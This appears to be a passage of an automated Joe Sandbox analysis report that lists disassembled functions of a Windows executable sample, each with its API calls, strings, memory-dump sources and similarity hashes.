Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401053
wsprintfW.USER32 ref: 00401071
lstrcatW.KERNEL32(?,?), ref: 00401084
ExitProcess.KERNEL32 ref: 004010AC

Strings

0x%p, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69

Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407DB6
SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
SHGetMalloc.SHELL32(00000000), ref: 00407E15

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Strings

A, xrefs: 00407DC8

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID: A
API String ID: 1557639607-3554254475
Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5

Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3

Strings

SetEnvironment, xrefs: 00402BB3, 00402BC2

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID: SetEnvironment
API String ID: 612612615-360490078
Opcode ID: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
Opcode Fuzzy Hash: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8

Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
Opcode Fuzzy Hash: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648

Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C

GetSystemMetrics.USER32(00000007), ref: 004080B4
GetSystemMetrics.USER32(00000007), ref: 004080C5
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C

Strings

100%% , xrefs: 004080E4, 004080EB, 00408144

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
Opcode Fuzzy Hash: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9

Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7

wsprintfW.USER32 ref: 00404F19
??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 00404F13
xcA, xrefs: 00404EB7

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X$xcA
API String ID: 1174869416-1550840741
Opcode ID: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
Opcode Fuzzy Hash: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C

Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
_wcsnicmp.MSVCRT ref: 0040423D

Strings

Mg@, xrefs: 00404224

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: lstrlen$_wcsnicmp
String ID: Mg@
API String ID: 2823567412-3680729969
Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5

Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
GetProcAddress.KERNEL32(00000000), ref: 004023CF

Strings

Wow64RevertWow64FsRedirection, xrefs: 004023BE
kernel32, xrefs: 004023C3

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C

Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
GetProcAddress.KERNEL32(00000000), ref: 00402401

Strings

Wow64DisableWow64FsRedirection, xrefs: 004023F0
kernel32, xrefs: 004023F5

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D

Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
Opcode Fuzzy Hash: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
memcpy.MSVCRT(00000000,00AD9958,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
??3@YAXPAX@Z.MSVCRT(00AD9958,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
Opcode Fuzzy Hash: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8

Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
GetDlgItem.USER32(?,000004B7), ref: 00408A97
SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 3043669009-0
Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54

Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
GetSystemMetrics.USER32(00000031), ref: 004070E8
CreateFontIndirectW.GDI32(?), ref: 004070F7
DeleteObject.GDI32(00000000), ref: 00407126

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94

Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 004085B0
GetClientRect.USER32(?,?), ref: 004085C2
PtInRect.USER32(?,?,?), ref: 004085D1

Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6

CallNextHookEx.USER32(?,?,?), ref: 004085F3

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49

Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
SetWindowTextW.USER32(?,?), ref: 0040417D
??3@YAXPAX@Z.MSVCRT(?), ref: 00404188

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
Opcode Fuzzy Hash: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98

Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407931
CreateFontIndirectW.GDI32(?), ref: 00407947
GetDlgItem.USER32(?,000004B5), ref: 0040795B
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69

Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401D92
GetWindowRect.USER32(?,?), ref: 00401DAB
ScreenToClient.USER32(00000000,?), ref: 00401DB9
ScreenToClient.USER32(00000000,?), ref: 00401DC0

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
